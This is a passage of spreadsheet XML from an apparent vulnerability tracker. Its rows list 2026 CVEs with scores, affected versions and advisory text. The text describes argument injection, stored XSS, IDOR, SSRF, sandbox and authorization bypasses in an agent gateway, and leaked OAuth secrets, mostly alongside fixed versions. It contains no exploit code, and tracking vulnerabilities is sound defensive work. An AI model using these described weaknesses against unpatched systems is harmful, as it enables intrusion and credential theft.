2.0.2. No complete workaround is available; users unable to upgrade should reject or remove double quotes from target paths and arguments, additionally reject shell metacharacters in versions 2.2.0 through 2.9.2 and 3.0.0-alpha.1 through 3.0.0-alpha.4, or bypass the PowerShell and Cmd wrappers and invoke target processes directly when handling untrusted input.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100368</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100369</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>nuget</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>nuget:AlastairLundy.CliInvoke, nuget:CliInvoke</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr">
        <is>
          <t>2.0.2, 2.10.5, 2.8.5, 2.9.4, 3.0.0-beta.2</t>
        </is>
      </c>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>CliInvoke and its formerly named `AlastairLundy.CliInvoke` package are .NET libraries for invoking command-line programs and wrapping executable processes. `CliInvoke` versions 2.0.0 through 2.8.4, 2.9.0 through 2.9.3, 2.10.0 through 2.10.4, and 3.0.0-alpha.1 through 3.0.0-beta.1, as well as `AlastairLundy.CliInvoke` versions 2.0.0-alpha.1 through 2.0.0, contain an argument-injection vulnerability in `RunnerProcessFactory` on the 2.x line and `RunnerConfigurationFactory` on the 3.x line. These factories combine runner arguments, a caller-controlled target, and caller-controlled arguments into one `ProcessStartInfo.Arguments` string, allowing a double quote in the target or an argument to terminate an operating-system-level quoted region and inject unintended elements into the runner’s argument vector, potentially resulting in arbitrary command execution when a shell runner is used. The vulnerability is patched in `CliInvoke` versions 2.8.5, 2.9.4, 2.10.5, and 3.0.0-beta.2, and in `AlastairLundy.CliInvoke` version 2.0.2. No complete workaround is available; users unable to upgrade can partially mitigate the issue by removing double quotes from targets and arguments, additionally removing shell metacharacters when using shell runners, or bypassing the vulnerable factory and constructing a `ProcessConfiguration` with an explicit `ArgumentList`.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100369</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56731</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, a low-privilege authenticated user may inject arbitrary HTML markup, including JavaScript event handlers, into a ticket title via the standard ticket creation workflow. The title is persisted without sanitization. This issue is fixed in version 7.0.1.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56731</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97898</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Insecure Direct Object Reference / missing object-level authorization in the Akia keyless entry cloud service. The unlock action is relying on a client-supplied room/door identifier that is not properly authorized server-side against the authenticated guest's booking. An authenticated guest could unlock rooms other than their own, resulting in unauthorized physical access to guest rooms at an affected property.
As of 19th September 2026 the service is no more vulnerable to this attack (feedback received by the reporter). 
The attack is remote but the effect is local to an affected property.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97898</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100551</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>OpenClaw for iOS versions &gt;= 2026.7.1 and &lt; 2026.8.11 do not enforce saved Gateway TLS pins in the Control UI. While native connections enforced the saved Gateway fingerprint, the authenticated Terminal and session Dashboard WebViews omitted it. If a user had accepted a Gateway fingerprint, an attacker able to redirect the same host and port and present a different certificate that is accepted by iOS system trust can serve a replacement Control UI page; opening the Terminal or a session Dashboard then allows that page to read the injected Gateway token or password. The stolen credential can grant operator access, including reading sensitive Gateway state and invoking host-capable tools. This issue is fixed in 2026.8.11.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100551</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100557</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in skill tool dispatch that fails to carry the sender's owner status. Non-owner senders authorized to invoke skill commands can access owner-only tools and server credentials reserved for owners.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100557</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100568</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to properly restrict access to operator command cron jobs, allowing model-visible agent callers to read and execute ownerless command jobs. Attackers can inspect stored environment variables and force-run disabled or unscheduled command jobs to access secrets and execute operator-authored commands.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100568</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100588</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 does not enforce the administrator scope requirement on browser control when it is reached through the node.invoke method, although direct browser.request access requires administrator scope. In Gateway deployments that honor caller identity and narrower operator scopes, a write-scoped caller with access to a connected browser-capable node can inspect pages, navigate tabs, or interact with browser-visible applications without the configured admin requirement; practical impact depends on the browser profile and signed-in state. Shared-secret token and password callers are considered fully trusted operators under OpenClaw's security model and are not affected. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100588</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100589</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.7.1 contain a sandbox bypass vulnerability in the browser tool that allows sandboxed sessions to access paired node browser actions despite allowHostControl=false configuration. Attackers with control over sandboxed agent input can select a paired node and perform host browser operations, inspecting or manipulating the connected browser profile and its authenticated state.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100589</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100391</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>MediaFlow Proxy through 2.4.9 contains a server-side request forgery vulnerability in the /proxy routes due to missing and incomplete destination validation in the d query parameter. Remote attackers can supply arbitrary internal URLs including loopback and cloud metadata endpoints to read full responses from the proxy server.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100391</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100567</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed as the npm package 'openclaw'. In versions &gt;= 2026.4.5 and &lt; 2026.8.1, the Gateway validated a single DNS resolution result for a configured remote Chrome DevTools Protocol (CDP) hostname, but the raw WebSocket and Playwright transports performed a later, independent DNS resolution, discarding the DNS pinning enforced at validation time. An attacker who controls an approved CDP hostname or its DNS answers can exploit this check-then-use gap via DNS rebinding to make the Gateway connect to a loopback, private, link-local, cloud metadata, or other SSRF-policy-denied address. The impact depends on the remote CDP configuration, DNS timing, and the services reachable from the Gateway host. The issue is fixed in 2026.8.1; as a mitigation, disable hostname-based remote CDP endpoints or restrict them to trusted, stable infrastructure.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100567</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67236</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, a successful POST /login caused is_authorized/2 to set an auth cookie containing base64-encoded username:password credentials without HttpOnly, Secure, SameSite, or expiration protections. Because base64 is encoding rather than encryption, an attacker with same-origin cross-site scripting, an HTTP-readable network position, or local access to the browser cookie store could recover the actual login credentials; older browsers that treated an absent SameSite attribute as None also sent the cookie cross-site. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67236</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67409</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18, JWKS Fetch Ignores HTTP Response Status Code - Signing Key Destruction Causes Authentication DoS (CWE-252). the JWKS key fetching mechanism in uaajwt.erl does not validate the HTTP response status code when downloading signing keys from the OAuth2 provider's JWKS endpoint. Non-200 responses (including 4xx and 5xx errors) are processed identically to successful responses. When the JWKS endpoint returns an error response with a valid-JSON body that lacks a keys field, all previously cached signing keys are destroyed, causing a persistent authentication denial of Files: deps/rabbitmqauthbackendoauth2/src/uaajwt.erl, lines 50-63 deps/rabbitmqauthbackendoauth2/src/uaajwks.erl, lines 5-7 deps/rabbitmqauthbackendoauth2/src/rabbitoauth2provider.erl, lines 98-107 Bug 1: HTTP status code ignored (uaajwt.erl:50-63): The Erlang httpc module returns {ok, {{HttpVersion, StatusCode, ReasonPhrase}, Headers, Body}}. The pattern {ok, {, , JwksBody}} matches ANY successful HTTP transaction Persistent authentication DoS: Once keys are destroyed, ALL OAuth2/JWT authentication fails for all users until a new successful JWKS refresh occurs Amplification: A single attacker can deny access to all legitimate OAuth2 users across the entire RabbitMQ. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67409</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67410</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.3.3 and 4.2.9, OAuth2 Client Secret Exposed via Unauthenticated JavaScript Endpoint (CWE-200). when OAuth2 authentication is enabled for the RabbitMQ Management UI and the configured flow, IDP use a client secret, the oauthclientsecret configuration value is included in the JavaScript served by the unauthenticated endpoint /js/oidc-oauth/bootstrap.js. Any user who can reach the management UI port can retrieve the OAuth2 client secret without Files: deps/rabbitmqmanagement/src/rabbitmgmtwmauth.erl, line 186 deps/rabbitmqmanagement/src/rabbitmgmtoauthbootstrap.erl, lines 35-50 deps/rabbitmqmanagement/src/rabbitmgmtdispatcher.erl, lines 45-49 (route registration) Code Path: 1. The route /js/oidc-oauth/bootstrap.js is registered as a plain Cowboy handler (rabbitmgmtdispatcher.erl:46): Credential exposure for the affected configuration: OAuth2 client secret is accessible without any authentication Token theft: Attacker can complete the authorization code flow using stolen authorization codes Client impersonation: Attacker can make requests. Any RabbitMQ deployment with: This issue is fixed in versions 4.3.3 and 4.2.9.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67410</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97525</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr"/>
